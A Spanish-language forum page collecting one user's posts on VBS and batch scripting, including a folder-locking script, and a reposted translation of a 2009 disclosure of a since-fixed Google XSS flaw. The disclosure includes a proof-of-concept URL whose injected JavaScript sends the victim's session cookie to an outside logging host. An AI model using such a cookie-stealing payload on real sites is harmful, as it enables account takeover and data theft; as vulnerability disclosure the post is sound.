Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Novlucker

#4251
Camtasia Studio ;D

Saludos
#4253
... o, tenemos el batch RDAP.CMD de 0x0309 que funciona a la perfección creando un archivo en las unidades removibles que no puede ser sobreescrito por los worms  :P

Saludos
#4254
Cuando navegas una web, debes de esperar que cargue completa, agrega una pausa o sleep mientras el estado del navegador sea busy

Saludos
#4255
Cita de: HJ ~ en 12 Mayo 2009, 23:11 PM
Pues yo conozco a uno que se hace llamar Fakundo que os estaba tirando la Web cada 2x3 este verano, que me acuerdo yo, y según él, no usaba más de 200 maquinas infectadas.

Que estaba tirando la web de quién? Si te refieres al foro, supongo que en el intento se quedaba sin ancho de banda en su conexión y el foro no se veía  :xD
#4256
Puede ser, porque lo he probado en una Celeron 2.66 con 512 Mb de Ram y me ha funcionado sin problemas  :-X

Saludos
#4257
Que características tiene tu pc?

Intenta cambiando las primeras líneas:
Código (vb) [Seleccionar]
Pass = "ThePass"
wscript.sleep 300


Extiende el sleep a 1500 por ejemplo, no va a funcionar como debe, pero tengo mis dudas si el problema no es por la velocidad de tu pc.  :-\
También puedes probar con un sleep luego del F4

Saludos
#4258
Scripting / Re: filnspect [VBS]
11 Mayo 2009, 16:43 PM
Simplemente comentar que como dije antes, estaba viendo que más le podía agregar al script, por lo que he añadido el parámetro "/P", el cual toma como input los procesos ejecutandose en la PC  :D , para lo cual entre otras cosas he debido de agregar una función para filtrar valores repetidos en la "colección"

Código (dos) [Seleccionar]
C:\Documents and Settings\Novlucker\Escritorio>cscript/nologo filnspect.vbs

Uso: cscript.exe/nologo filnspect.vbs [formato] [parametro]

        Formato Parametro
        /F      Ruta Carpeta
        /A      Ruta Archivo (Conteniendo listado)
        /L      Lista de archivos separados por coma
        /P      Análisis de procesos en ejecución (Cualquier valor)

Ejemplos:
        cscript.exe/nologo filnspect.vbs /F C:\WINDOWS
        cscript.exe/nologo filnspect.vbs /A C:\Archivos.txt
        cscript.exe/nologo filnspect.vbs /L "mstsc.exe,syskey.exe,appmgr.dll"
        cscript.exe/nologo filnspect.vbs /P -

C:\Documents and Settings\Novlucker\Escritorio>


Saludos  :P

P.d: Tener en cuenta de que puede servir para dar un primer vistazo, pero solo para eso, ya que el análisis en si se basa en el nombre de ejecutables, y si nos referimos a malware, este puede tomar el nombre de ejecutables legítimos
#4259
Vulnerabilidad XSS Universal en todos los Servicios Google puede comprometer su información personal

Vulnerabilidad Reportada: 18-Abril-2009 9.33 pm
Respuesta de Google: 18-Abril-2009 10.19 pm (Wow! eso es súper rápido para un sábado :))
Vulnerabilidad Reparada: 05-Mayo-2009 7.05 pm
Cambio Propagado: 07-Mayo-2009 3.19 pm

Recientemente informé de una falla cross-scripting (XSS) a Google, que ahora ya está arreglada. La vulnerabilidad existía en el Script Python del Soporte de Google en donde una URL maliciosa no era depurada del caracter XSS ' (comilla simple) antes de ponerlo dentro de la variable logURL de javascript. Como resultado, era posible romper el encapsulamiento de la declaración var y ejecutar comandos javascript arbitrarios en el dominio principal Google.com.

La única limitación eran los siguientes caractéres que eran o bien filtrados o codificados para url - " (comillas dobles) < > (espacio) { }. Sin embargo, esta protección podía ser sorteada fácilmente. Puede escribir un comando javascript para robar cookies de sesión [gracias a que caractéres como ' ; . ( ) / = +aún estaban disponibles] y enviarlos a mi sitio malicioso. Vea el ejemplo que se da abajo.

Su cookie del dominio Google.com es el cookie central de autenticación única (SSO) para todos los servicios google. Una vez que alguien cualquiera lo obtenga, él o ella pueden usarlo para

1. Robarle sus emails.
2. Robarle sus contactos.
3. Robarle sus documentos.
4. Robarle sus código.
5. Robarle sus sitios.
6. Robarle sus website analytics.
7. Poner una entrada trasera en su página de inicio de iGoogle con gadgets maliciosos.
.... y deben haber aun varias cosas más que quedan con las que podrían jugar.

Un código de una sencilla Prueba de Concepto puede mostrar su cookie de Google.com en un cuadro de alerta:

http://google.com/support/webmasters/bin/answer.py?answer=34575&cbid=-1oudgq5c3804g

Un ejemplo más de la vida real donde un atacante silenciosamente transfiere su cookie Google.com a su sitio maligno:-

http://google.com/support/webmasters/bin/answer.py?answer=34575&cbid=-1oudgq5c3804g';ifr=document.createElement('iframe');ifr.src='http:'+'//www.securethoughts.com/security/cookielogger/log.cgi?cookie='+escape(document.cookie);document.body.appendChild(ifr);//src=cb&lev=index

Quiero agradecer al equipo de Seguridad de Google por sus rápidas respuestas y arreglo a este serio problema en tiempo y forma. Si piensa que Google se tomó mucho tiempo para arreglar esta vulnerabilidad, piénselo de nuevo. Este script de python es usado en muchos lugares. Intente esta soncera en Google para ver el uso de este script en casi todos los Servicios Google.

Fuente:http://securethoughts.com/2009/05/universal-xss-vulnerability-in-all-google-services-can-compromise-your-personal-information/
Traducción para Segu-info:http://blog.segu-info.com.ar/2009/05/vulnerabilidad-xss-universal-en-todos.html
#4260
Cita de: :: SmartGenius :: en 11 Mayo 2009, 05:45 AM
Espero a ver que gran code nos trae el amigo Novlucker, ya mas o menos tengo una idea de como hacer esto en batch puro, ero pues seria mejor implementarlo en VBS.

Naaaa, es un code bastante sencillito fácil de entender ya que además lo he recortado un poco haciendolo más "básico", la principal variante con respecto al de 3D1 es la manera en la que se implementa partiendo del funcionamiento del resto del script  :P

Código (vb) [Seleccionar]
'by Novlucker
Set objshell = createobject("wscript.shell")
Window = "Mis documentos"
ScriptSign = "by Novlucker"
Pass = "ThePass"
wscript.sleep 300

Do
If objshell.appactivate(Window) = True then
If objshell.appactivate(ScriptSign) = True then
objshell.appactivate(Window)
Do until objshell.appactivate(Window) = True
wscript.sleep 100
Loop
objshell.sendkeys "%{F4}"
objshell.appactivate(ScriptSign)
Else
Set SecScript = objshell.exec("wscript.exe """ & wscript.scriptfullname & """")
Quest = Inputbox("Ingrese contraseña para desbloquear archivo o carpeta",ScriptSign)
If Quest = Pass then
On error resume next
SecScript.terminate
Msgbox "La contraseña ingresada es correcta" & vbnewline & _
vbnewline & "Ya puede acceder" , 64, "Info"
End if
wscript.quit
End if
End if
wscript.sleep 100
Loop


Como se ve, este bloquea el acceso a Mis documentos, así que para probarlo con otra carpeta solo hay que modificar el valor de la variable "Window", y tener en cuenta también la variable "ScriptSign", la cual juega un papel importante en el code, ya que de no estar entraríamos en un bucle infinito de ejecución de wscript.exe

Espero se entienda y sino lo comento  :P

Saludos